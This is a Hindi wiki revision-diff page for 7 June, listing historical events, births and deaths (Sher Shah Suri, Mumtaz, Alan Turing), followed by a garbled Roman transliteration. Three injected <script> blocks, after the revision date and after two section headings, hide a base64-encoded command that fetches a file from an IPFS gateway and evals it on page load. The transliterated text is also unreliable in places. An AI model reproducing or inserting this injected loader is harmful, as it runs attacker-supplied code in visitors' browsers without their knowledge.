Difference between revisions of "7 जून"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (1 अवतरण)
 
 
(19 intermediate revisions by 8 users not shown)
Line 1: Line 1:
 
{{कैलंडर}}
 
{{कैलंडर}}
  
[[ग्रेगोरी कैलंडर]] के अनुसार 7 जून [[वर्ष]] का 158 वाँ (लीप वर्ष में यह 159 वाँ) दिन है। साल मे अभी और 207 दिन शेष हैं।
+
[[ग्रेगोरी कैलंडर]] के अनुसार 7 जून [[वर्ष]] का 158 वाँ ([[लीप वर्ष]] में यह 159 वाँ) दिन है। साल में अभी और 207 दिन शेष हैं।
  
 
==7 जून की महत्त्वपूर्ण घटनाएँ==
 
==7 जून की महत्त्वपूर्ण घटनाएँ==
 +
* 1539 - बक्सर के निकट चौसा की लड़ाई में [[अफ़गान]] [[शेरशाह सूरी]] ने [[मुग़ल]] बादशाह [[हुमायूँ]] को हराया।
 +
* 1631 - मु्ग़ल बादशाह [[शाहजहाँ]] की बीबी [[मुमताज़ बेगम]] की बुरहानपुर में 39 वर्ष की आयु में मृत्यु हो गई।
 +
* [[1893]] - [[महात्मा गांधी]] ने [[दक्षिण अफ़्रीका]] में प्रथम बार सविनय अवज्ञा का प्रयोग किया।
 +
* [[1989]] - [[भारत]] के दूसरे उपग्रह भास्कर प्रथम का सोवियत रॉकेट से प्रक्षेपण किया गया।
 +
* [[1995]] - नार्मन थैगार्ड अंतरिक्ष की कक्षा में सबसे लम्बे समय तक रहने वाले अमेरिकी अंतरिक्ष यात्री बने।
 +
* [[1998]] - स्पेन के कार्लोस मोया ने फ़्रेंच ओपन प्रतियोगिता का पुरुष एकल ख़िताब जीता।
 +
* [[1999]] - [[श्रीलंका]] में प्रचलित आव्रजन नियम निरस्त।
 +
* [[2000]] - एक अमेरिकी अदालत द्वारा माइक्रोसॉफ़्ट कंपनी को दो भागों में बांटने का निर्देश।
 +
* [[2004]] - इस्रायली मंत्रिमंडल ने गाजा क्षेत्र से बस्तियाँ हटाने सम्बन्धी प्रस्ताव को मंजूरी दी।
 +
* [[2006]] - भारत द्वारा नेपाल को आर्थिक पुनर्निर्माण के लिए एक अरब रुपये देने का निर्णय।
 +
* [[2007]] - अमेरिका ने सऊदी अरब के राजदूत रहे प्रिंस बांदरे बिन सुल्तान के हथियारों की दलाली में करोड़ों पाउंड के घोटाले का खुलासा।
 +
* [[2008]]- [[उत्तर प्रदेश]] सरकार ने रसोई गैस पर लगने वाले 4% वैट को पूरी तरह से समाप्त घोषित किया।
  
 
==7 जून को जन्मे व्यक्ति==
 
==7 जून को जन्मे व्यक्ति==
 +
* [[1998]] - [[सुमित अंतिल]] - [[भारत]] के भाला फेंक पैरा एथलीट हैं।
 +
* [[1974]] - [[महेश भूपति]] - [[भारत]] के [[टेनिस]] खिलाड़ी।
 +
* [[1914]] - [[ख़्वाजा अहमद अब्बास]]- प्रसिद्ध फ़िल्म निर्देशक, पटकथा लेखक और [[उर्दू]] लेखक
 +
* [[1909]] - [[वर्जीनिया एपगर]] - अमेरिकी प्रसूति एनेस्थेटिस्ट थीं।
  
 
==7 जून को हुए निधन==
 
==7 जून को हुए निधन==
 +
* [[2011]] - [[नटराज रामकृष्ण]] - [[भारत]] के एक नृत्य गुरु थे।
 +
* [[2002]] - [[बी डी जत्ती]] -  [[फ़ख़रुद्दीन अली अहमद]] की मृत्यु के बाद [[भारत]] के कार्यवाहक [[राष्ट्रपति]]।
 +
* [[1954]] - [[एलेन ट्यूरिंग]] - अंग्रेज़ गणितज्ञ और कम्प्यूटर वैज्ञानिक थे।
  
 
==7 जून के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==7 जून के महत्त्वपूर्ण अवसर एवं उत्सव==

Latest revision as of 09:26, 23 January 2022

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 7 joon varsh ka 158 vaan (lip varsh mean yah 159 vaan) din hai. sal mean abhi aur 207 din shesh haian.

7 joon ki mahattvapoorn ghatanaean

  • 1539 - baksar ke nikat chausa ki l daee mean afagan sherashah soori ne mugal badashah humayooan ko haraya.
  • 1631 - muhgal badashah shahajahaan ki bibi mumataz begam ki burahanapur mean 39 varsh ki ayu mean mrityu ho gee.
  • 1893 - mahatma gaandhi ne dakshin afrika mean pratham bar savinay avajna ka prayog kiya.
  • 1989 - bharat ke doosare upagrah bhaskar pratham ka soviyat r aauket se prakshepan kiya gaya.
  • 1995 - narman thaigard aantariksh ki kaksha mean sabase lambe samay tak rahane vale ameriki aantariksh yatri bane.
  • 1998 - spen ke karlos moya ne freanch opan pratiyogita ka purush ekal khitab jita.
  • 1999 - shrilanka mean prachalit avrajan niyam nirast.
  • 2000 - ek ameriki adalat dvara maikros aauft kanpani ko do bhagoan mean baantane ka nirdesh.
  • 2004 - israyali mantrimandal ne gaja kshetr se bastiyaan hatane sambandhi prastav ko manjoori di.
  • 2006 - bharat dvara nepal ko arthik punarnirman ke lie ek arab rupaye dene ka nirnay.
  • 2007 - amerika ne soodi arab ke rajadoot rahe prians baandare bin sultan ke hathiyaroan ki dalali mean karo doan pauand ke ghotale ka khulasa.
  • 2008- uttar pradesh sarakar ne rasoee gais par lagane vale 4% vait ko poori tarah se samapt ghoshit kiya.

7 joon ko janme vyakti

7 joon ko hue nidhan

7 joon ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>